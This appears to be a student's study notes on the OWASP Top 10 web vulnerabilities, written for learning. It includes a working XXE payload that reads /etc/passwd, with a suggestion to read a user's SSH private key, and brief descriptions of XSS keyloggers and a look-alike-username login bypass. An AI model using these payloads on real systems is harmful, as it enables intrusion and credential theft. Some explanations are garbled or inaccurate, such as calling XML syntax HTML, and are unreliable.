Anthony Herrera

Search

SearchSearch

OWASP Top 10

Jun 20, 2024, 5 min read

OWASP top 10

Open Web Application Security Project top ten issues found in computers. Let’s go!

1 - Injections

This is the most common issue. That is, user input is taken as commands and run. Types include SQL injection whee the attacker can use the database and command injections where the attacker is able to put commands to the target computer.

These two vectors could allows the attacker to modified, insert or delete information from the database or execute arbitrary commands and escalate privileges.

These can be defended by using a list of allowed characters or by removing any dangerous characters

OS Command Injections occurs when the client side machine makes a call to the hosting machine.

1 - Practical Command Injection

Blind injection is when the command does not return data. Active command injection is when the attack returns data back to the attacker

2 - Broken Authentication

Issues with authentication include weak passwords, susceptibility to brute force attacks and weak session tokens. To counter these, the website should enforce strong password use, lockout a user after a given number of login attempts and use session tokens that can’t be easily guessed and finally using multifactor authentication

One way we can take advantage of broken authentication is to register a user with the same name as an actual user but with a slight change - ” anthony” instead of “anthony”. In a broken system this will end up showing the information for “anthony” when logged in.

3 - Sensitive Data Exposure

Sometimes webpages just throw a flat file database in the website. Downnload and get info - check ./01_hasing_notes.md

4 - XML External Entity

Basically abuses the parsing of XML and can allow some interesting things to happen.

These can be broken down in to in band and out of bound (OOB-XXE). In-band attacks receives immediate response. Out of bound (blind) XXE means that there is no immediate response

But what is XML

XML stand for eXensible Markup Language which is a language that is used for both machine readable and human readable code. Sounds like it might be similar to markdown, which is what this document is written in

Some key point of XML is it is platform independent, data stored can be altered without changing presentation, validation using DTD and Schema (?) so there are no syntax errors, because platform independent, can share between systems without and issue.

Syntax

The syntax of HTML goes something like:

    <?xml version="1.0" encoding="UTF-8"?>
    <mail>
       <to>falcon</to>
       <from>feast</from>
       <subject>About XXE</subject>
       <text>Teach about XXE</text>
    </mail>

Basically just HTML but different

DTD

The DTD is the syntax validator that defines the structure and allowed elements. DTD stands for Document Type Definition. Because, you know, it defines the document type. Example of a DTD that could be used:

    <!DOCTYPE note [ <!ELEMENT note (to,from,heading,body)>
    <!ELEMENT to (#PCDATA)> <!ELEMENT from (#PCDATA)> <!ELEMENT heading (#PCDATA)> <!ELEMENT body (#PCDATA)> ]> ```

Example

Let’s actually do some testing now

This will sometimes work to file a file:

<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY read SYSTEM 'file:///etc/passwd'>]>
<root>&read;</root>

If instead of reading /etc/passwd we can go ahead and read /home/falcon/.ssh/id_rsa which will give us the ssh key for the user “falcon” which we got from the passwd file

Broken Access Control

This one is pretty simple - if you can view websites that you’re not supposed to view then the access control is broken.

IDOR - Insecure Direct Object Reference is a way to exploit the way the user input is handled. IE - a type of access control vulnerability

Security Misconfiguration

Default username and password falls under this category. Yep. It happens. A LOT. Also http headers that reveal information, overly detailed error messages, services that aren’t needed and just misconfigured resources (public s3 buckets)

XSS

Cross Site Scripting is a vulnerability that allows an attacker to run malicious scripts on a target’s machine. The three types of XSS are Stored, Reflected and DOM-Based. Stored attacks are the most dangerous - these are ones where the malicious string originates from the website’s database. This can can happen when user input is not sanitized. The next type of attack is a Reflected XSS. This is where the target actually is the one that sends the script to the websites to run. In this way the script is “reflected” off the website and back to the victim. This involved the user clicking on a malicious link that sends the malicious code to the website and back. Finally there is DOM-Based XSS which is … another kind. Based on how the website runs.

Payloads might in include popups ), writing HTML where the target is shown whatever HTML code you want them to see, XSS keylogger where all the user input is recorded, and port scanners that act as a mini local port scanner.

Hey here’s a fun website: XSS-Payloads.com

OH… Basically you are just putting HTML in the website some how and it is executing. For example, you might put <h1>Hello!</h1> and it would render in a chat box. Or, you could put )` and it would make a popup for everyone in the chat

Graph View

Backlinks